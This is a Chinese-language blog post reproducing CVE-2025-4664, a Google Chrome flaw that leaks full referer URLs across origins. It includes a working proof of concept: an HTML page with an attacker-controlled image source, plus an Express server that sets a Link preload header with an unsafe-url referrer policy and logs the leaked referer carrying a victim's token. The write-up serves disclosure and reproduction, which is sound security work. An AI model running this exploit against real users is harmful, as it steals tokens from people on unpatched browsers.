Google-Chrome-跨源数据泄露漏洞-CVE-2025-4664-复现


title: Google Chrome 跨源数据泄露漏洞(CVE-2025-4664)复现
date: 2025-05-15 20:42:27
tags:

  • 信息泄露
  • Referer-Policy
    categories:
  • Web漏洞复现

前言

前几天才写了一篇文章1,关于数据包中referer头信息泄露的问题。能窃取referer头中的敏感信息。窃取关键是要启用unsafe-url,这里就是前端开发的设置问题了。最近爆出了一个Chrome浏览器的漏洞,就是去窃取用户referer头中的敏感信息,不需要前端启用了unsafe-url也可以实现敏感信息的窃取。最初我在X上看到了提出这个问题的推文2,当时好像是说不算是漏洞问题,后面Google给了CVE,定级为CVE-2025-4664。下面我们来复现一下这个漏洞。

漏洞描述

在这里插入图片描述
Google 发布公告称**Google Chrome 跨源数据泄露漏洞(CVE-2025-4664)**存在在野利用,该漏洞源于 Google Chrome 加载程序中的策略执行不足,远程攻击者利用此漏洞可使浏览器发起请求时携带完整的URL,导致敏感信息泄露3目前该漏洞已发现在野利用。

鉴于此漏洞影响范围较大,建议客户尽快做好自查及防护。⚠️⚠️⚠️

漏洞影响版本

Google Chrome(Windows/Mac) < 136.0.7103.113/.114

Google Chrome(Linux) < 136.0.7103.113

漏洞复现

还是按照之前写的1

  • AURLhttp://127.0.0.1:3000/index.html?token=xxxxxx
  • B为这个index.html页面,其中img标签的src属性我们可控,其页面不启用unsafe-url

攻击效果: 受害者会带着自己的token,就是这里的A,访问到页面BB中的img标签的src属性我们可控,设置为攻击者监听数据包的脚本,监听的数据包中包含有敏感信息的referer,进而实现信息的窃取。

Bindex.html页面内容如下,其中的http://127.0.0.1:3001/image为攻击者嵌入的监听数据包的恶意URL,这里为了演示方便我使用了本地的127.0.0.1:3001表示。这里页面没启用unsafe-url,正常是窃取不到referer头中的敏感信息的。

<!DOCTYPE html>
<html>
<head>
  <title>Logo</title>
</head>
<body>
  <h1>Logo Picture</h1>
  <img src="http://127.0.0.1:3001/image" alt="Logo Picture">
</body>
</html>

对于http://127.0.0.1:3001/image的后端代码main.js如下:

const express = require('express')
const app = express()
const port = 3001
const path = require('path')

app.get('/image',(req,res) => {
    res.setHeader('Link','<http://127.0.0.1:3001/log>;rel="preload"; as="image";referrerpolicy="unsafe-url"')
    res.sendFile(path.join(__dirname,'logo.png'))
});

app.get('/log',(req, res) => {
    console.log(req.headers['referer']);
    res.send('Hi!');
});

app.listen(port,() => {
    console.log(`Server running at http://localhost:${port}`);
});

本地使用python3 -m http.server 3000启用一个web服务,把B这个index.html页面放在当前启用web服务的目录下,受害者访问A,即http://127.0.0.1:3000/index.html?token=secret,表示受害者正常访问页面,到达了B

攻击者在自己的vpsnode main.js运行恶意的脚本,即得到这里的http://127.0.0.1:3001/image。将这个恶意的URL,嵌入到B这个正常安全的页面中去,前提是Bsrc属性是攻击者可控的。

受害者使用不安全的Google Chrome浏览器版本,去访问安全Referer-Policy配置的 B页面时,就会导致referer头中的敏感信息泄露。
请添加图片描述
结果如下:
请添加图片描述
请添加图片描述
请添加图片描述
我使用的Chrome版本如下,低于安全版本。
请添加图片描述

参考


  1. https://x2nn.github.io/2025/05/06/%E6%95%B0%E6%8D%AE%E5%8C%85referer%E5%A4%B4%E4%B8%AD%E6%95%8F%E6%84%9F%E4%BF%A1%E6%81%AF%E7%9A%84%E7%AA%83%E5%8F%96/ ↩︎ ↩︎

  2. https://x.com/slonser_/status/1919439373986107814 ↩︎

  3. https://mp.weixin.qq.com/s/Gz0PBUfFv4Cz7FUNDjYTcQ ↩︎

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

X2n.

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值